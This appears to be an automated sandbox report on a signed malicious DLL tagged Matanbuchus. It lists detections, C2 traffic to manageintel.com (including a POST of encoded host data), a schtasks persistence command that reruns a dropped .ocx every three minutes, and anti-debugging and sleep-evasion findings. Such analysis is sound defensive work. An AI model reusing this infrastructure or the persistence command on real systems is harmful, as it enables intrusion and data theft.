Windows Analysis Report
smphost.dll

Overview

General Information

Sample Name: smphost.dll
Analysis ID: 562835
MD5: fc484855692f2a7d1eae090086a1eb72
SHA1: 2e9103747750b40835f58d9e57c2ab75eeaf25f6
SHA256: e58b9bbb7bcdf3e901453b7b9c9e514fed1e53565e3280353dccc77cde26a98e
Tags: dllmatanbuchusSATURNCONSULTANCYLTDsigned
Infos:

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Uses known network protocols on non-standard ports
Sigma detected: Regsvr32 Network Activity
Sigma detected: Suspicious Call by Ordinal
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: smphost.dll Virustotal: Detection: 8% Perma Link
Antivirus detection for URL or domain
Source: http://manageintel.com/WUzZRUBQje/Auth.php Avira URL Cloud: Label: malware

Compliance
barindex
Uses 32bit PE files
Source: smphost.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
Source: unknown HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49831 version: TLS 1.2
Source: unknown HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.3:49837 version: TLS 1.2
Source: smphost.dll Static PE information: certificate valid
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9EED8A FindFirstFileExW, 0_2_6E9EED8A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 25_2_6F6CED8A FindFirstFileExW, 25_2_6F6CED8A

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: the.earth.li
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 185.14.31.158 32710 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 93.93.131.124 187 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: manageintel.com
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49840
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ITLDC-NLUA ITLDC-NLUA
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /~sgtatham/putty/0.76/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cacheConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 93.93.131.124 93.93.131.124
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49835 -> 185.14.31.158:32710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp, regsvr32.exe String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml
Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp, regsvr32.exe String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml
Source: unknown HTTP traffic detected: POST /WUzZRUBQje/Auth.php HTTP/1.1User-Agent: Windows-AzureAD-Authentication-Provider/11.0Host: manageintel.comContent-Length: 549Content-Type: application/x-www-form-urlencodedAccept-Language: en-USData Raw: 61 75 74 68 3d 65 79 49 7a 51 30 56 72 49 6a 6f 69 56 33 4a 47 65 44 6c 68 55 45 73 31 64 30 35 6a 54 31 56 57 52 6b 78 47 55 32 74 6d 51 6c 6c 4c 4d 30 78 6a 59 56 4e 6c 5a 31 4e 45 53 6b 70 50 56 7a 52 35 56 31 45 33 4d 30 77 79 52 6e 64 71 4b 32 34 77 50 53 49 73 49 6a 4e 6d 5a 54 45 78 49 6a 6f 69 53 79 73 30 4f 47 39 52 50 54 30 69 4c 43 49 7a 62 54 64 34 49 6a 6f 69 56 58 4a 30 62 79 74 68 52 54 30 69 4c 43 49 31 5a 47 56 69 4f 57 4d 69 4f 69 4a 4a 64 54 41 35 63 43 39 79 56 69 49 73 49 6b 52 54 4d 6e 67 69 4f 69 4a 4b 5a 58 4e 73 4d 48 46 68 56 79 49 73 49 6b 56 4d 61 69 49 36 49 6c 56 78 62 47 63 77 63 58 46 50 4d 30 56 7a 55 53 49 73 49 6b 56 76 4e 69 49 36 49 6c 68 79 4e 58 67 34 59 55 55 39 49 69 77 69 52 6e 52 76 49 6a 6f 69 53 6e 63 39 50 53 49 73 49 6c 45 32 57 44 59 69 4f 69 4a 57 57 6e 42 4d 4d 6c 70 74 63 53 74 6e 50 54 30 69 4c 43 4a 55 51 55 31 6d 62 53 49 36 57 79 4a 58 53 58 52 36 4b 7a 55 72 61 7a 56 57 61 79 74 4c 64 7a 30 39 49 6c 30 73 49 6d 4e 43 52 69 49 36 49 6c 5a 77 64 32 38 78 64 6e 5a 51 4f 54 4a 6f 55 6c 46 6f 64 32 46 6c 65 6d 70 6b 5a 45 68 7a 50 53 49 73 49 6d 55 77 4d 32 56 6b 49 6a 6f 69 56 55 39 57 57 6e 67 32 59 55 30 77 56 56 56 4d 51 31 68 61 61 30 31 42 4b 32 35 6d 62 57 64 50 65 55 74 6e 4e 47 56 68 4f 56 68 55 54 6b 4a 4f 55 32 56 4d 56 45 4e 6d 57 54 30 69 4c 43 4a 6d 4d 57 52 68 49 6a 6f 69 56 44 52 4f 51 6a 46 61 65 58 41 30 56 31 56 7a 56 6e 67 77 52 32 5a 35 61 6b 68 43 5a 7a 51 39 49 69 77 69 64 31 41 32 49 6a 6f 69 57 6d 55 30 63 6d 38 72 53 46 49 69 4c 43 4a 33 5a 32 70 32 49 6a 6f 69 57 6b 78 6f 64 6a 56 6e 50 54 30 69 4c 43 4a 36 61 30 4d 33 49 6a 6f 69 49 6e 30 3d Data Ascii: auth=eyIzQ0VrIjoiV3JGeDlhUEs1d05jT1VWRkxGU2tmQllLM0xjYVNlZ1NESkpPVzR5V1E3M0wyRndqK24wPSIsIjNmZTExIjoiSys0OG9RPT0iLCIzbTd4IjoiVXJ0bythRT0iLCI1ZGViOWMiOiJJdTA5cC9yViIsIkRTMngiOiJKZXNsMHFhVyIsIkVMaiI6IlVxbGcwcXFPM0VzUSIsIkVvNiI6IlhyNXg4YUU9IiwiRnRvIjoiSnc9PSIsIlE2WDYiOiJWWnBMMlptcStnPT0iLCJUQU1mbSI6WyJXSXR6KzUrazVWaytLdz09Il0sImNCRiI6IlZwd28xdnZQOTJoUlFod2FlempkZEhzPSIsImUwM2VkIjoiVU9WWng2YU0wVVVMQ1haa01BK25mbWdPeUtnNGVhOVhUTkJOU2VMVENmWT0iLCJmMWRhIjoiVDROQjFaeXA0V1VzVngwR2Z5akhCZzQ9Iiwid1A2IjoiWmU0cm8rSFIiLCJ3Z2p2IjoiWkxodjVnPT0iLCJ6a0M3IjoiIn0=
Source: unknown DNS traffic detected: queries for: manageintel.com
Source: global traffic HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /~sgtatham/putty/0.76/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cacheConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: unknown HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49831 version: TLS 1.2
Source: unknown HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.3:49837 version: TLS 1.2

System Summary
barindex
Uses 32bit PE files
Source: smphost.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
One or more processes crash
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 2076
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9F3EB6 0_2_6E9F3EB6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9E8C90 0_2_6E9E8C90
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 25_2_6F6D3EB6 25_2_6F6D3EB6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 25_2_6F6C8C90 25_2_6F6C8C90
Found potential string decryption / allocating functions
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 6E9E9960 appears 34 times
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 6F6C9960 appears 34 times
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\6\5507.ocx E58B9BBB7BCDF3E901453B7B9C9E514FED1E53565E3280353DCCC77CDE26A98E
Source: smphost.dll Virustotal: Detection: 8%
Source: smphost.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\smphost.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: unknown Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 2076
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB43.tmp Jump to behavior
Source: classification engine Classification label: mal88.troj.evad.winDLL@19/7@5/2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9E8630 DllInstall,FormatMessageA,TextOutW,TextOutA,FormatMessageW,CoInitialize,OleInitialize,CoCreateInstance,CoGetCallerTID,FlattenPath,CreatePopupMenu,GetProductInfo,SetFileAttributesW,CharNextW,SHGetThreadRef,DceErrorInqTextA,GetConsoleCP,UuidCreate,GetMessageTime,GetVersion,GetPriorityClass,GetProcessId,IsTokenRestricted,RevertToSelf,RpcExceptionFilter,CveEventWrite,CoCancelCall,CoTaskMemAlloc,GetSidIdentifierAuthority,DisableThreadLibraryCalls,IsValidAcl,IsValidSid,CreateMutexExW,SHStrDupW,SHStrDupA,DuplicateIcon, 0_2_6E9E8630
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6260
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\computer
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: smphost.dll Static PE information: certificate valid
Source: smphost.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: smphost.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: smphost.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: smphost.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: smphost.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: smphost.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: smphost.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: smphost.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: smphost.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: smphost.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: smphost.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: smphost.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
Registers a DLL
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll

Persistence and Installation Behavior
barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\SysWOW64\regsvr32.exe File created: C:\ProgramData\6\5507.ocx Jump to dropped file
Drops PE files
Source: C:\Windows\SysWOW64\regsvr32.exe File created: C:\ProgramData\6\5507.ocx Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49840
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4604 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4604 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4604 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2008 Thread sleep time: -54000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe Last function: Thread delayed
Found large amount of non-executed APIs
Source: C:\Windows\System32\loaddll32.exe API coverage: 6.8 %
Source: C:\Windows\SysWOW64\regsvr32.exe API coverage: 6.3 %
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9EED8A FindFirstFileExW, 0_2_6E9EED8A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 25_2_6F6CED8A FindFirstFileExW, 25_2_6F6CED8A
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Thread delayed: delay time: 30000 Jump to behavior
Source: regsvr32.exe, 00000003.00000003.524171226.0000000005247000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.523620825.0000000005151000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.518162902.0000000005151000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.511554101.0000000005051000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 7qAJTueJV05Xwegg6bMAAApTi10HgfsAbFhzMiq3oTtaEegJyQAAWY/AdTfkf4tG
Source: regsvr32.exe, 00000003.00000003.524171226.0000000005247000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.523620825.0000000005151000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bVf2XmkyVwC+WwEAAI1F4FpWU1dl//91iQ4iqeMuV07UhiCL+IN94AoPhboPAACF

Anti Debugging
barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9E9CF7 IsDebuggerPresent,OutputDebugStringW, 0_2_6E9E9CF7
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9EFE17 GetProcessHeap, 0_2_6E9EFE17
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9E1710 mov eax, dword ptr fs:[00000030h] 0_2_6E9E1710
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9E1490 mov eax, dword ptr fs:[00000030h] 0_2_6E9E1490
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9E83B0 mov eax, dword ptr fs:[00000030h] 0_2_6E9E83B0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9EC865 mov eax, dword ptr fs:[00000030h] 0_2_6E9EC865
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9EE9B4 mov eax, dword ptr fs:[00000030h] 0_2_6E9EE9B4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 25_2_6F6C1710 mov eax, dword ptr fs:[00000030h] 25_2_6F6C1710
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 25_2_6F6C1490 mov eax, dword ptr fs:[00000030h] 25_2_6F6C1490
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 25_2_6F6C83B0 mov eax, dword ptr fs:[00000030h] 25_2_6F6C83B0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 25_2_6F6CE9B4 mov eax, dword ptr fs:[00000030h] 25_2_6F6CE9B4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 25_2_6F6CC865 mov eax, dword ptr fs:[00000030h] 25_2_6F6CC865
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\regsvr32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9E9AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6E9E9AED
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9EC0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6E9EC0A3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E9E9839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6E9E9839
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 25_2_6F6C9AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 25_2_6F6C9AED
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 25_2_6F6C9839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 25_2_6F6C9839
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 25_2_6F6CC0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 25_2_6F6CC0A3

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: the.earth.li
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 185.14.31.158 32710 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 93.93.131.124 187 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: manageintel.com
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 Jump to behavior

Language, Device and Operating System Detection
barindex
